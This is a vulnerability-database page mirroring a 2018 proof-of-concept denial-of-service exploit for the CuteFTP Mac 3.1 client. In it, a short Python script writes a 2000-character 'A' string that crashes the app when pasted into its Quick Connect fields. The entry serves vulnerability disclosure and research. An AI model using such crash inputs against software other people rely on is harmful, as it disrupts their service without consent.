Lucene search
K

CuteFTP Mac 3.1 - Denial of Service Exploit

🗓️ 13 Nov 2018 00:00:00Reported by Yair Rodríguez AparicioType 
zdt
 zdt
🔗 0day.today👁 162 Views

CuteFTP Mac 3.1 Denial of Service (PoC) on macOS High Sierra 10.1

Code
# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC)
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: http://go.globalscape.com/download/cuteftp-macosx
# Version: 3.1
# Tested on: macOS High Sierra 10.13
 
# Steps to Produce the Crash:
# 1.- Run python code : python cute.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open CuteFTP Mac
# 4.- Clic on "Quick Connect"
# 4.- Paste clipboard on "Host", "User", "Password" and "Port"
# 5.- click on "Run"
# 6.- Crashed!
 
 
 
buffer = "\x41" * 2000
f = open("text.txt", "w")
f.write(buffer)
f.close()

#  0day.today [2018-11-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation